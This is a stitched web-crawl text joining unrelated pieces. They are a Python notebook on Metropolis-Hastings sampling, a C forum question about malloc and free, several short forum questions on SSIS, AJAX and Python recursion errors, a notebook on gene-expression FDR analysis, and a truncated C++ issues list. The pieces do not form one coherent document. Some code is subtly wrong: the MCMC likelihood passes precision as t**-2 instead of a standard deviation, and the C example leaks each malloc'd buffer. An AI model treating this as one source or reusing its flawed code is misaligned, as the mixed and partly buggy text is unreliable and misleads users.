        fig['layout'][i]['gridcolor'] = 'rgb(255, 255, 255)'
    fig['layout']['paper_bgcolor'] = 'rgb(255, 255, 255)'
    fig['layout']['plot_bgcolor'] = 'rgba(204, 204, 204, 0.5)'
    fig['layout']['showlegend'] = False
add_style(fig4)
fig4['layout'].update( yaxis1=pgo.YAxis(title=r'$\lambda_1$'), yaxis3=pgo.YAxis(title=r'$\lambda_2$'), yaxis5=pgo.YAxis(title=r'$\tau$'))
py.iplot(fig4, filename='modelling_params')
The Metropolis-Hastings Algorithm
The key to success in applying the Gibbs sampler to the estimation of Bayesian posteriors is being able to specify the form of the complete conditionals of ${\bf \theta}$, because the algorithm cannot be implemented without them. In practice, the posterior conditionals cannot always be neatly specified.
Taking a different approach, the Metropolis-Hastings algorithm generates candidate state transitions from an alternate distribution, and accepts or rejects each candidate probabilistically.
Let us first consider a simple Metropolis-Hastings algorithm for a single parameter, $\theta$. We will use a standard sampling distribution, referred to as the proposal distribution, to produce candidate variables $q_t(\theta^{\prime} | \theta)$. That is, the generated value, $\theta^{\prime}$, is a possible next value for $\theta$ at step $t+1$. We also need to be able to calculate the probability of moving back to the original value from the candidate, or $q_t(\theta | \theta^{\prime})$. These probabilistic ingredients are used to define an acceptance ratio:$$a(\theta^{\prime},\theta) = \frac{q_t(\theta | \theta^{\prime})\, \pi(\theta^{\prime})}{q_t(\theta^{\prime} | \theta)\, \pi(\theta)}$$
The value of $\theta^{(t+1)}$ is then determined by:$$\theta^{(t+1)} = \begin{cases}\theta^{\prime} & \text{with probability } \min(a(\theta^{\prime},\theta^{(t)}),1) \\ \theta^{(t)} & \text{with probability } 1 - \min(a(\theta^{\prime},\theta^{(t)}),1) \end{cases}$$
This transition kernel implies that movement is not guaranteed at every step. It only occurs if the suggested transition is likely based on the acceptance ratio.
A single iteration of the Metropolis-Hastings algorithm proceeds as follows:
Sample $\theta^{\prime}$ from $q(\theta^{\prime} | \theta^{(t)})$.
Generate a Uniform[0,1] random variate $u$.
If $a(\theta^{\prime},\theta) > u$ then $\theta^{(t+1)} = \theta^{\prime}$, otherwise $\theta^{(t+1)} = \theta^{(t)}$.
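These three steps can be written out directly. The sketch below is illustrative rather than the implementation used later in this section; `log_target` stands in for the log of the (unnormalized) posterior density, and the proposal is a symmetric normal, so the acceptance ratio reduces to $\pi(\theta^{\prime})/\pi(\theta)$:

```python
import math
import random

def metropolis_step(theta, log_target, scale, rng=random):
    """One Metropolis-Hastings update with a symmetric normal proposal."""
    # 1. Sample a candidate from q(theta' | theta) -- here N(theta, scale^2)
    theta_prime = rng.gauss(theta, scale)
    # 2. Generate a Uniform[0, 1] random variate
    u = rng.random()
    # 3. Accept with probability min(a, 1); working on the log scale,
    #    log a = log pi(theta') - log pi(theta) for a symmetric proposal
    log_a = log_target(theta_prime) - log_target(theta)
    if math.log(u) < log_a:
        return theta_prime   # move to the candidate
    return theta             # stay at the current value
```

Iterating this step produces a chain whose stationary distribution is the target; the full samplers below follow the same pattern, parameter by parameter.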
The original form of the algorithm specified by Metropolis required that $q_t(\theta^{\prime} | \theta) = q_t(\theta | \theta^{\prime})$, which reduces $a(\theta^{\prime},\theta)$ to $\pi(\theta^{\prime})/\pi(\theta)$, but this is not necessary. In either case, the state moves to high-density points in the distribution with high probability, and to low-density points with low probability. After convergence, the Metropolis-Hastings algorithm describes the full target posterior density, so all points are recurrent.
Random-walk Metropolis-Hastings
A practical implementation of the Metropolis-Hastings algorithm makes use of a random-walk proposal. Recall that a random walk is a Markov chain that evolves according to:$$ \theta^{(t+1)} = \theta^{(t)} + \epsilon_t \\ \epsilon_t \sim f(\phi) $$
As applied to MCMC sampling, the random walk is used as a proposal distribution, whereby dependent proposals $\theta^{\prime} = \theta^{(t)} + \epsilon_t$ are generated according to:$$q(\theta^{\prime} | \theta^{(t)}) = f(\theta^{\prime} - \theta^{(t)})$$
Generally, the density generating $\epsilon_t$ is symmetric about zero, resulting in a symmetric chain. Chain symmetry implies that $q(\theta^{\prime} | \theta^{(t)}) = q(\theta^{(t)} | \theta^{\prime})$, which reduces the Metropolis-Hastings acceptance ratio to:$$a(\theta^{\prime},\theta) = \frac{\pi(\theta^{\prime})}{\pi(\theta)}$$
The choice of the random walk distribution for $\epsilon_t$ is frequently a normal or Student’s $t$ density, but it may be any distribution that generates an irreducible proposal chain.
An important consideration is the specification of the scale parameter for the random walk error distribution. Large values produce random walk steps that are highly exploratory, but tend to produce proposal values in the tails of the target distribution, potentially resulting in very small acceptance rates. Conversely, small values tend to be accepted more frequently, since they tend to produce proposals close to the current parameter value, but may result in chains that mix very slowly.
Some simulation studies suggest optimal acceptance rates in the range of 20-50%. It is often worthwhile to optimize the proposal variance by iteratively adjusting its value, according to observed acceptance rates early in the MCMC simulation.
Example: Linear model estimation
This very simple dataset is a selection of real estate prices $p$, with the associated age $a$ of each house. We wish to estimate a simple linear relationship between the two variables, using the Metropolis-Hastings algorithm.
Linear model:$$\mu_i = \beta_0 + \beta_1 a_i$$
Sampling distribution:$$p_i \sim N(\mu_i, \tau)$$
Prior distributions:$$\begin{aligned} & \beta_i \sim N(0, 10000) \cr & \tau \sim \text{Gamma}(0.001, 0.001) \end{aligned}$$
age = np.array([13, 14, 14, 12, 9, 15, 10, 14, 9, 14, 13, 12, 9, 10, 15,
                11, 15, 11, 7, 13, 13, 10, 9, 6, 11, 15, 13, 10, 9, 9, 15,
                14, 14, 10, 14, 11, 13, 14, 10])

price = np.array([2950, 2300, 3900, 2800, 5000, 2999, 3950, 2995, 4500, 2800,
                  1990, 3500, 5100, 3900, 2900, 4950, 2000, 3400, 8999, 4000,
                  2950, 3250, 3950, 4600, 4500, 1600, 3900, 4200, 6500, 3500,
                  2999, 2600, 3250, 2500, 2400, 3990, 4600, 450, 4700]) / 1000.
To avoid numerical underflow issues, we typically work with log-transformed likelihoods, so the joint posterior can be calculated as sums of log-probabilities and log-likelihoods.
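To see why this matters: multiplying many small likelihood terms underflows double precision long before realistic sample sizes are reached, while the equivalent sum of logs stays comfortably finite. A small illustration with made-up probabilities:

```python
import numpy as np

# 2000 independent likelihood terms, each equal to 1e-3
probs = np.full(2000, 1e-3)

# Multiplying directly underflows: 1e-6000 is far below the smallest
# positive double (~1e-308), so the running product collapses to exactly 0.0
naive_product = np.prod(probs)

# Summing logs instead stays well within floating-point range
log_sum = np.sum(np.log(probs))
```

Any downstream comparison of posteriors (such as the acceptance ratio in Metropolis-Hastings) can then be done entirely with differences of log-probabilities.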
This function calculates the joint log-posterior, conditional on values for each parameter:
from scipy.stats import distributions
dgamma = distributions.gamma.logpdf
dnorm = distributions.norm.logpdf

def calc_posterior(a, b, t, y=price, x=age):
    # Calculate joint posterior, given values for a, b and t

    # Priors on a, b
    logp = dnorm(a, 0, 10000) + dnorm(b, 0, 10000)
    # Prior on t
    logp += dgamma(t, 0.001, 0.001)
    # Calculate mu
    mu = a + b * x
    # Data likelihood
    logp += sum(dnorm(y, mu, t**-2))

    return logp
The metropolis function implements a simple random-walk Metropolis-Hastings sampler for this problem. It accepts as arguments:
- the number of iterations to run
- initial values for the unknown parameters
- the variance parameter of the proposal distribution (normal)
rnorm = np.random.normal
runif = np.random.rand

def metropolis(n_iterations, initial_values, prop_var=1):

    n_params = len(initial_values)

    # Initial proposal standard deviations
    prop_sd = [prop_var] * n_params

    # Initialize trace for parameters
    trace = np.empty((n_iterations + 1, n_params))

    # Set initial values
    trace[0] = initial_values

    # Calculate joint posterior for initial values
    current_log_prob = calc_posterior(*trace[0])

    # Initialize acceptance counts
    accepted = [0] * n_params

    for i in range(n_iterations):

        if not i % 1000:
            print 'Iteration', i

        for j in range(n_params):

            # Propose a new value for parameter j from a normal
            # centred on its current value
            proposal = trace[i].copy()
            theta = rnorm(trace[i, j], prop_sd[j])
            proposal[j] = theta

            # Calculate log posterior with proposed value
            proposed_log_prob = calc_posterior(*proposal)

            # Log-acceptance ratio
            alpha = proposed_log_prob - current_log_prob

            # Sample a uniform random variate and test the proposed value
            u = runif()
            if np.log(u) < alpha:
                # Accept
                trace[i + 1, j] = theta
                current_log_prob = proposed_log_prob
                accepted[j] += 1
            else:
                # Reject
                trace[i + 1, j] = trace[i, j]

    return trace, accepted
Let's run the MH algorithm with a very small proposal variance:
n_iter = 10000
trace, acc = metropolis(n_iter, initial_values=(1,0,1), prop_var=0.001)
Iteration 0
Iteration 1000
Iteration 2000
Iteration 3000
Iteration 4000
Iteration 5000
Iteration 6000
Iteration 7000
Iteration 8000
Iteration 9000
We can see that the acceptance rate is way too high:
np.array(acc, float)/n_iter
array([ 0.9768, 0.9689, 0.961 ])
trace1 = pgo.Scatter(y=trace.T[0], xaxis='x1', yaxis='y1',
                     marker=pgo.Marker(color=color))

trace2 = pgo.Histogram(x=trace.T[0], xaxis='x2', yaxis='y2',
                       marker=pgo.Marker(color=color))

trace3 = pgo.Scatter(y=trace.T[1], xaxis='x3', yaxis='y3',
                     marker=pgo.Marker(color=color))

trace4 = pgo.Histogram(x=trace.T[1], xaxis='x4', yaxis='y4',
                       marker=pgo.Marker(color=color))

trace5 = pgo.Scatter(y=trace.T[2], xaxis='x5', yaxis='y5',
                     marker=pgo.Marker(color=color))

trace6 = pgo.Histogram(x=trace.T[2], xaxis='x6', yaxis='y6',
                       marker=pgo.Marker(color=color))
data5 = pgo.Data([trace1, trace2, trace3, trace4, trace5, trace6])
fig5 = tls.make_subplots(3, 2)

fig5['data'] += data5
add_style(fig5)
fig5['layout'].update(showlegend=False, yaxis1=pgo.YAxis(title='intercept'), yaxis3=pgo.YAxis(title='slope'), yaxis5=pgo.YAxis(title='precision') )
py.iplot(fig5, filename='MH algorithm small proposal variance')
Now, with a very large proposal variance:
trace_hivar, acc = metropolis(n_iter, initial_values=(1,0,1), prop_var=100)
Iteration 0
Iteration 1000
Iteration 2000
Iteration 3000
Iteration 4000
Iteration 5000
Iteration 6000
Iteration 7000
Iteration 8000
Iteration 9000
np.array(acc, float)/n_iter
array([ 0.003 , 0.0001, 0.0009])
trace1 = pgo.Scatter(y=trace_hivar.T[0], xaxis='x1', yaxis='y1',
                     marker=pgo.Marker(color=color))

trace2 = pgo.Histogram(x=trace_hivar.T[0], xaxis='x2', yaxis='y2',
                       marker=pgo.Marker(color=color))

trace3 = pgo.Scatter(y=trace_hivar.T[1], xaxis='x3', yaxis='y3',
                     marker=pgo.Marker(color=color))

trace4 = pgo.Histogram(x=trace_hivar.T[1], xaxis='x4', yaxis='y4',
                       marker=pgo.Marker(color=color))

trace5 = pgo.Scatter(y=trace_hivar.T[2], xaxis='x5', yaxis='y5',
                     marker=pgo.Marker(color=color))

trace6 = pgo.Histogram(x=trace_hivar.T[2], xaxis='x6', yaxis='y6',
                       marker=pgo.Marker(color=color))
data6 = pgo.Data([trace1, trace2, trace3, trace4, trace5, trace6])
fig6 = tls.make_subplots(3, 2)

fig6['data'] += data6
add_style(fig6)
fig6['layout'].update( yaxis1=pgo.YAxis(title='intercept'), yaxis3=pgo.YAxis(title='slope'), yaxis5=pgo.YAxis(title='precision') )
py.iplot(fig6, filename='MH algorithm large proposal variance')
Adaptive Metropolis
In order to avoid having to set the proposal variance by trial-and-error, we can add some tuning logic to the algorithm. The following implementation of Metropolis-Hastings reduces proposal variances by 10% when the acceptance rate is low, and increases it by 10% when the acceptance rate is high.
def metropolis_tuned(n_iterations, initial_values, f=calc_posterior, prop_var=1,
                     tune_for=None, tune_interval=100):

    n_params = len(initial_values)

    # Initial proposal standard deviations
    prop_sd = [prop_var] * n_params

    # Initialize trace for parameters
    trace = np.empty((n_iterations + 1, n_params))

    # Set initial values
    trace[0] = initial_values

    # Initialize acceptance counts
    accepted = [0] * n_params

    # Calculate joint posterior for initial values
    current_log_prob = f(*trace[0])

    if tune_for is None:
        tune_for = n_iterations / 2

    for i in range(n_iterations):

        if not i % 1000:
            print 'Iteration', i

        for j in range(n_params):

            # Propose a new value for parameter j from a normal
            # centred on its current value
            proposal = trace[i].copy()
            theta = rnorm(trace[i, j], prop_sd[j])
            proposal[j] = theta

            # Calculate log posterior with proposed value
            proposed_log_prob = f(*proposal)

            # Log-acceptance ratio
            alpha = proposed_log_prob - current_log_prob

            # Test the proposed value
            if np.log(runif()) < alpha:
                # Accept
                trace[i + 1, j] = theta
                current_log_prob = proposed_log_prob
                accepted[j] += 1
            else:
                # Reject
                trace[i + 1, j] = trace[i, j]

            # Tune every `tune_interval` iterations during the tuning period
            if (not (i + 1) % tune_interval) and (i < tune_for):

                # Calculate acceptance rate
                acceptance_rate = (1. * accepted[j]) / tune_interval

                if acceptance_rate < 0.1:
                    prop_sd[j] *= 0.9
                elif acceptance_rate < 0.2:
                    prop_sd[j] *= 0.95
                elif acceptance_rate > 0.6:
                    prop_sd[j] *= 1.1
                elif acceptance_rate > 0.4:
                    prop_sd[j] *= 1.05

                accepted[j] = 0

    return trace[tune_for:], accepted
trace_tuned, acc = metropolis_tuned(n_iter*2, initial_values=(1,0,1), prop_var=5, tune_interval=25, tune_for=n_iter)
Iteration 0
Iteration 1000
Iteration 2000
Iteration 3000
Iteration 4000
Iteration 5000
Iteration 6000
Iteration 7000
Iteration 8000
Iteration 9000
Iteration 10000
Iteration 11000
Iteration 12000
Iteration 13000
Iteration 14000
Iteration 15000
Iteration 16000
Iteration 17000
Iteration 18000
Iteration 19000
np.array(acc, float)/(n_iter)
array([ 0.2888, 0.312 , 0.3421])
trace1 = pgo.Scatter(y=trace_tuned.T[0], xaxis='x1', yaxis='y1',
                     line=pgo.Line(width=1), marker=pgo.Marker(color=color))

trace2 = pgo.Histogram(x=trace_tuned.T[0], xaxis='x2', yaxis='y2',
                       marker=pgo.Marker(color=color))

trace3 = pgo.Scatter(y=trace_tuned.T[1], xaxis='x3', yaxis='y3',
                     line=pgo.Line(width=1), marker=pgo.Marker(color=color))

trace4 = pgo.Histogram(x=trace_tuned.T[1], xaxis='x4', yaxis='y4',
                       marker=pgo.Marker(color=color))

trace5 = pgo.Scatter(y=trace_tuned.T[2], xaxis='x5', yaxis='y5',
                     line=pgo.Line(width=0.5), marker=pgo.Marker(color=color))

trace6 = pgo.Histogram(x=trace_tuned.T[2], xaxis='x6', yaxis='y6',
                       marker=pgo.Marker(color=color))
data7 = pgo.Data([trace1, trace2, trace3, trace4, trace5, trace6])
fig7 = tls.make_subplots(3, 2)

fig7['data'] += data7
add_style(fig7)
fig7['layout'].update( yaxis1=pgo.YAxis(title='intercept'), yaxis3=pgo.YAxis(title='slope'), yaxis5=pgo.YAxis(title='precision') )
py.iplot(fig7, filename='adaptive-metropolis')
50 random regression lines drawn from the posterior:
# Data points
points = pgo.Scatter(
    x=age,
    y=price,
    mode='markers'
)

# Sample models from posterior
xvals = np.linspace(age.min(), age.max())
line_data = [np.column_stack([np.ones(50), xvals]).dot(trace_tuned[np.random.randint(0, 1000), :2])
             for i in range(50)]

# Generate Scatter objects
lines = [pgo.Scatter(x=xvals,
                     y=line,
                     opacity=0.5,
                     marker=pgo.Marker(color='#e34a33'),
                     line=pgo.Line(width=0.5))
         for line in line_data]

data8 = pgo.Data([points] + lines)

layout8 = layout_grey_bg.copy()
layout8.update(
    showlegend=False,
    hovermode='closest',
    xaxis=pgo.XAxis(title='Age', showgrid=False, zeroline=False),
    yaxis=pgo.YAxis(title='Price', showline=False, zeroline=False)
)

fig8 = pgo.Figure(data=data8, layout=layout8)
py.iplot(fig8, filename='regression_lines')
Exercise: Bioassay analysis
Gelman et al. (2003) present an example of an acute toxicity test, commonly performed on animals to estimate the toxicity of various compounds.
In this dataset, log_dose includes 4 levels of dosage, on the log scale, each administered to 5 rats during the experiment. The response variable is death, the number of positive responses to the dosage.
The number of deaths can be modeled as a binomial response, with the probability of death being a linear function of dose on the logit scale:$$\begin{aligned} & y_i \sim \text{Bin}(n_i, p_i) \cr & \text{logit}(p_i) = a + b x_i \end{aligned}$$
The common statistic of interest in such experiments is the LD50, the dosage at which the probability of death is 50%.
Use Metropolis-Hastings sampling to fit a Bayesian model to analyze this bioassay data, and to estimate LD50.
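Once posterior samples of the intercept and slope are available, LD50 on the log-dose scale follows directly from the model: it is the dose at which the logit is zero, i.e. $a + b x = 0$, giving $x = -a/b$. The helper below is an illustration (not part of the original exercise); applied elementwise to the trace, it yields posterior samples of LD50:

```python
import numpy as np

def ld50(intercept_samples, slope_samples):
    """Posterior samples of LD50: logit(p) = a + b*x = 0  =>  x = -a/b."""
    a = np.asarray(intercept_samples, dtype=float)
    b = np.asarray(slope_samples, dtype=float)
    return -a / b
```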
# Log dose in each group
log_dose = [-.86, -.3, -.05, .73]

# Sample size in each group
n = 5

# Outcomes
deaths = [0, 1, 3, 5]
from scipy.stats import distributions
dbin = distributions.binom.logpmf
dnorm = distributions.norm.logpdf

invlogit = lambda x: 1. / (1 + np.exp(-x))

def calc_posterior(a, b, y=deaths, x=log_dose):

    # Priors on a, b
    logp = dnorm(a, 0, 10000) + dnorm(b, 0, 10000)
    # Calculate p
    p = invlogit(a + b * np.array(x))
    # Data likelihood
    logp += sum([dbin(yi, n, pi) for yi, pi in zip(y, p)])

    return logp
bioassay_trace, acc = metropolis_tuned(n_iter, f=calc_posterior, initial_values=(1,0), prop_var=5, tune_for=9000)
Iteration 0
Iteration 1000
Iteration 2000
Iteration 3000
Iteration 4000
Iteration 5000
Iteration 6000
Iteration 7000
Iteration 8000
Iteration 9000
trace1 = pgo.Scatter(y=bioassay_trace.T[0], xaxis='x1', yaxis='y1',
                     marker=pgo.Marker(color=color))

trace2 = pgo.Histogram(x=bioassay_trace.T[0], xaxis='x2', yaxis='y2',
                       marker=pgo.Marker(color=color))

trace3 = pgo.Scatter(y=bioassay_trace.T[1], xaxis='x3', yaxis='y3',
                     marker=pgo.Marker(color=color))

trace4 = pgo.Histogram(x=bioassay_trace.T[1], xaxis='x4', yaxis='y4',
                       marker=pgo.Marker(color=color))
data9 = pgo.Data([trace1, trace2, trace3, trace4])
fig9 = tls.make_subplots(2, 2)
This is the format of your plot grid:
[ (1,1) x1,y1 ]  [ (1,2) x2,y2 ]
[ (2,1) x3,y3 ]  [ (2,2) x4,y4 ]
fig9['data'] += data9
add_style(fig9)
fig9['layout'].update( yaxis1=pgo.YAxis(title='intercept'), yaxis3=pgo.YAxis(title='slope') )
py.iplot(fig9, filename='bioassay') | https://plot.ly/ipython-notebooks/computational-bayesian-analysis/ | CC-MAIN-2018-05 | en | refinedweb |
Hello! I have a question in regards to malloc/calloc and free in C. What I'm unsure about is the "depth" (for lack of a better word) that free operates to. I know that sounds strange so let this example hopefully explain what I mean:
#include <stdlib.h>

int main () {
    int length = 10;
    char **list = (char **) malloc(sizeof(char *) * length);
    char *temp;
    int i;

    for (i = 0; i < length; i++) {
        temp = (char *) malloc(13);
        temp = "Hello world!\0";
        list[i] = temp;
    }

    free(list); // free the char** AND all of its indices' malloc'd memory?
}
So I was wondering if the last call of free would not only free up the char ** memory of "list", but also all the malloc'd memory of each of its indices? Or does it not, and should in fact be called via:
for (i = 0; i < length; i++)
    free(list[i]);
free(list);
... which would explicitly free each index before the pointer to char pointers.
So would some compilers know that only freeing the list should free all its indices, or would I always get a memory leak with that? Either way, I want to know if there's an ANSI standard on this... which is probably the second method here if anything.
Thanks in advance for clearing up my confusion!
Edited by shadwickman: n/a | https://www.daniweb.com/programming/software-development/threads/248945/the-extent-of-free-on-malloc-calloc | CC-MAIN-2018-05 | en | refinedweb |
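For reference, here is the second pattern written out in full, with the string bytes copied into each allocated block rather than reassigning the pointer. Note that `free` only ever releases the single block whose address is passed to it, which is why every element must be freed before the pointer array; the function names `make_string_list` and `free_string_list` are just illustrative:

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Allocate an array of `length` heap-allocated copies of `text`. */
static char **make_string_list(int length, const char *text) {
    char **list = malloc(sizeof(char *) * (size_t)length);
    if (list == NULL)
        return NULL;
    for (int i = 0; i < length; i++) {
        list[i] = malloc(strlen(text) + 1);  /* +1 for the terminating '\0' */
        strcpy(list[i], text);               /* copy bytes; don't reassign the pointer */
    }
    return list;
}

/* free() releases only the block its argument points to, so each string
   must be freed before the pointer array that holds them. */
static void free_string_list(char **list, int length) {
    for (int i = 0; i < length; i++)
        free(list[i]);
    free(list);
}
```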
This notebook demonstrates how to do a simple differential expression analysis on a gene expression dataset. We use false discovery rates to provide interpretable results when conducting an analysis that involves large scale multiple hypothesis testing.
The data set we analyze here contains measurements of the expression levels of 22,283 genes in peripheral blood mononuclear cells (PBMCs). Data for 127 subjects are included, 26 of whom have ulcerative colitis, and 59 of whom have Crohn's disease (the remaining subjects are healthy and will not be considered here). The goal is to identify genes that have different mean expression levels in the two disease groups.
The raw data are available here as accession number GDS1615 from the NCBI's GEO (Gene Expression Omnibus) site.
Here are the import statements for the modules that we will use.
import gzip
import urllib2
import numpy as np
from StringIO import StringIO
from statsmodels.stats.multitest import multipletests
from scipy.stats.distributions import norm
import matplotlib.pyplot as plt
We cannot decompress data on the fly while reading from a url, so instead we first download the compressed data into a string, wrap the string in a stringio object, and wrap that in a gzipfile object that can do the decompression.
url = urllib2.urlopen("")
zdata = url.read()
sio = StringIO(zdata)
fid = gzip.GzipFile(fileobj=sio)
Alternatively, the data can be downloaded and read this way:
fid = gzip.open("GDS1615_full.soft.gz")
Next we read the SOFT format data file into the following data structures:

- SIF: a dictionary mapping each sample identifier to its subset description (the disease group)
- SID: the list of sample identifiers
- STP: the list of sample labels (the disease group of each sample)
- GID: the list of gene identifiers
- X: a NumPy array of gene expression measurements (one row per gene, one column per sample)
We begin by reading the header section of the data file, and placing the information we need into a dictionary:
SIF = {}
for line in fid:
    if line.startswith("!dataset_table_begin"):
        break
    elif line.startswith("!subset_description"):
        subset_description = line.split("=")[1].strip()
    elif line.startswith("!subset_sample_id"):
        subset_ids = line.split("=")[1].split(",")
        subset_ids = [x.strip() for x in subset_ids]
        for k in subset_ids:
            SIF[k] = subset_description
Now we create arrays containing some information we will need while processing the data.
# Next line is the column headers (sample id's)
SID = fid.next().split("\t")

# The column indices that contain gene expression data
I = [i for i,x in enumerate(SID) if x.startswith("GSM")]

# Restrict the column headers to those that we keep
SID = [SID[i] for i in I]

# Get a list of sample labels
STP = [SIF[k] for k in SID]
Next we read the gene expression data row by row, and place the gene id's into a separate array.
# Read the gene expression data as a list of lists, also get the gene identifiers
GID,X = [],[]
for line in fid:

    # This is what signals the end of the gene expression data
    # section in the file
    if line.startswith("!dataset_table_end"):
        break

    V = line.split("\t")

    # Extract the values that correspond to gene expression measures
    # and convert the strings to numbers
    x = [float(V[i]) for i in I]
    X.append(np.asarray(x))

    GID.append(V[0] + ";" + V[1])

# Convert the Python list of lists to a Numpy array.
X = np.asarray(X)
We are comparing two groups, and will ignore the remaining (healthy) samples. Here we get the column indices of the samples in each of the two groups being compared.
# The indices of samples for the ulcerative colitis group
UC = [i for i,x in enumerate(STP) if x == "ulcerative colitis"]

# The indices of samples for the Crohn's disease group
CD = [i for i,x in enumerate(STP) if x == "Crohn's disease"]
Gene expression data is usually skewed, so we analyze it on the log scale.
XL = np.log(X) / np.log(2)
Now that we have the data, we can calculate the mean and variance for each gene within each of the two groups.
MUC = XL[:,UC].mean(1)  ## Mean of ulcerative colitis samples
MCD = XL[:,CD].mean(1)  ## Mean of Crohn's disease samples
VUC = XL[:,UC].var(1)   ## Variance of ulcerative colitis samples
VCD = XL[:,CD].var(1)   ## Variance of Crohn's disease samples
nUC = len(UC)           ## Number of ulcerative colitis samples
nCD = len(CD)           ## Number of Crohn's disease samples
The Z-scores summarize the evidence for differential expression.
zscores = (MUC - MCD) / np.sqrt(VUC/nUC + VCD/nCD)
If a gene is not differentially expressed, it has the same expected value in the two groups of samples. In this case, the Z-score will be standardized (i.e. will have mean zero and unit standard deviation). This data set contains data for 22,283 genes. So if none of the genes are differentially expressed, our Z-scores should approximately have zero mean and unit variance. We can check this as follows.
print zscores.mean()
print zscores.std()
0.174053802007
1.50181311998
Since the standard deviation is much greater than 1, there appear to be multiple genes for which the mean expression levels in the ulcerative colitis and Crohn's disease samples differ. Further, since the mean Z-score is positive, it appears that the dominant pattern is for genes to be expressed at a higher level in the ulcerative colitis compared to the Crohn's disease samples.
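As a sanity check on this reasoning, computing the same statistic on pure-noise data — no true group differences, with group sizes chosen to match this study (26 and 59) — does give Z-scores with mean near zero and standard deviation near one:

```python
import numpy as np

rng = np.random.RandomState(0)

# 5000 "genes" with no true group difference: both groups standard normal
group1 = rng.randn(5000, 26)   # sized like the ulcerative colitis group
group2 = rng.randn(5000, 59)   # sized like the Crohn's disease group

# Same two-sample Z-score formula used on the real data
z_null = (group1.mean(1) - group2.mean(1)) / \
         np.sqrt(group1.var(1) / 26 + group2.var(1) / 59)
```

So the excess spread observed in the real Z-scores (standard deviation around 1.5) reflects the data, not the statistic itself.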
The conventional threshold for statistical significance is a p-value smaller than 0.05, which corresponds to the Z-score being greater than 2 in magnitude. Many genes meet this condition, however as we will see below this does not carry much evidence that these genes are differentially expressed.
print np.mean(np.abs(zscores) > 2)
print np.mean(zscores > 2)
print np.mean(zscores < -2)
0.175470089306
0.108199075528
0.0672710137773
To use the multiple testing methods we need to convert the Z-scores to p-values.
pvalues = 2*norm.cdf(-np.abs(zscores))
Here we compute the Benjamini-Hochberg false discovery rates. The adjusted p-values are in the first position of the returned value.
pm = multipletests(pvalues, method="fdr_bh")
apv = pm[1]
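For intuition, the "fdr_bh" adjustment applied above can be sketched directly. This is a simplified re-implementation of the Benjamini-Hochberg step-up procedure, shown only to illustrate what multipletests computes (the library version handles additional options and edge cases):

```python
import numpy as np

def bh_adjust(pvalues):
    """Benjamini-Hochberg adjusted p-values (step-up procedure)."""
    p = np.asarray(pvalues, dtype=float)
    m = len(p)
    order = np.argsort(p)                       # indices of p sorted ascending
    # Raw adjusted values: p_(i) * m / rank
    ranked = p[order] * m / np.arange(1, m + 1)
    # Enforce monotonicity: running minimum from the largest p-value down
    ranked = np.minimum.accumulate(ranked[::-1])[::-1]
    ranked = np.minimum(ranked, 1.0)
    # Put the adjusted values back in the original order
    adjusted = np.empty(m)
    adjusted[order] = ranked
    return adjusted
```

Rejecting all hypotheses with an adjusted p-value below a threshold q then controls the false discovery rate at level q.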
This plot shows how the Z-scores and false discovery rates are related.
ii = np.argsort(zscores)
plt.plot(zscores[ii], apv[ii], '-')
plt.xlabel("Z-score")
plt.ylabel("False Discovery Rate")
<matplotlib.text.Text at 0x5221ed0>
This plot shows how the p-values and false discovery rates are related.
ii = np.argsort(pvalues)
plt.plot(pvalues[ii], apv[ii], '-')
plt.xlabel("p-value")
plt.ylabel("False Discovery Rate")
<matplotlib.text.Text at 0x3b69ad0> | http://nbviewer.jupyter.org/urls/umich.box.com/shared/static/7kh8amlez7bx3qlqa6aa.ipynb | CC-MAIN-2018-05 | en | refinedweb |
Hello everyone,
sorry if the following appears like a total newbie question, but I'm taking my first college course using MS SQL Server & SSIS, so please bear with me :)
I'm currently working on an assignment and face a couple (maybe mundane) problems:
Hi,

Is there a possibility to create an AJAX tab within an AJAX tab?

Please advise.
<%@ Register assembly="AjaxControlToolkit" namespace="AjaxControlToolkit" tagprefix="cc2" %>
I have a complex data structure that I'm trying to process.
Explanation of the data structure: I have a dictionary of classes. The key is a name. The value is a class reference. The class contains two lists of dictionaries.
Here's a simple example of my data structure:
import scipy.stats

class employee_salaries(object):
    def __init__(self, management, players, disparity):
        self.management = management
        self.players = players
        self.disparity = disparity

# The coach's salary was 12 his 1st year and 11 his 2nd year
mgmt1 = [{'Coach': 12, 'Owner': 15, 'Team Manager': 13},
         {'Coach': 11, 'Owner': 14, 'Team Manager': 15}]
plyrs1 = [{'Point Guard': 14, 'Power Forward': 16},
          {'Point Guard': 16, 'Power Forward': 18}]

NBA = {}

mgmt2 = [{'Coach': 10, 'Owner': 12}, {'Coach': 13, 'Owner': 15}]
plyrs2 = [{'Point Guard': 17, 'Power Forward': 14},
          {'Point Guard': 22, 'Power Forward': 16}]

NBA['cavs'] = employee_salaries(mgmt1, plyrs1, 0)
NBA['celtics'] = employee_salaries(mgmt2, plyrs2, 0)
Let's say I wanted to determine the disparity between the Point Guard's salary and the Owner's salary over these two years.
for key, value in NBA.iteritems():
    x1 = []
    x2 = []
    num = len(NBA[key].players)
    for i in range(0, num):
        x1.append(NBA[key].players[i]['Point Guard'])
        x2.append(NBA[key].management[i]['Owner'])
    tau, p_value = scipy.stats.kendalltau(x1, x2)
    NBA[key].disparity = tau

print NBA['cavs'].disparity
Keep in mind this is not my real data. In my actual data structure, there are over 150 keys. And there are more elements in the list of dictionaries. When I run the code above on my real data, I get a runtime error.
RuntimeError: maximum recursion depth exceeded in cmp
How can I change the code above so that it doesn't give me a maximum recursion depth error? I want to do this type of comparison and be able to save the value. | http://www.howtobuildsoftware.com/index.php/how-do/bOx/python-list-dictionary-recursion-python-runtimeerror-maximum-recursion-depth-exceeded-in-cmp | CC-MAIN-2018-05 | en | refinedweb |
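For what it's worth, the error itself can be reproduced independently of the data structure above: Python raises it whenever any call chain exceeds `sys.getrecursionlimit()`, regardless of what the calls do. A generic sketch, not tied to scipy:

```python
import sys

def depth(n):
    # Each call adds a stack frame; Python aborts once the chain
    # exceeds the interpreter's recursion limit (1000 by default)
    if n == 0:
        return 0
    return 1 + depth(n - 1)

def exceeds_limit(n):
    """Return True if recursing n levels deep hits the recursion limit."""
    try:
        depth(n)
        return False
    except RuntimeError:  # RecursionError subclasses RuntimeError on Python 3
        return True
```

Raising the limit with `sys.setrecursionlimit` is a workaround, but the usual fix is to eliminate the deep recursion (or deep object comparison) entirely.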
This document contains the C++ core language issues for which the Committee (J16 + WG21) has decided that no action is required, that is, issues with status "NAD" ("Not A Defect"), "dup" (duplicate), and "concepts".
Bullet 13.3 of _N4567_.
According to 1.10 [intro.multithread] paragraph 24,

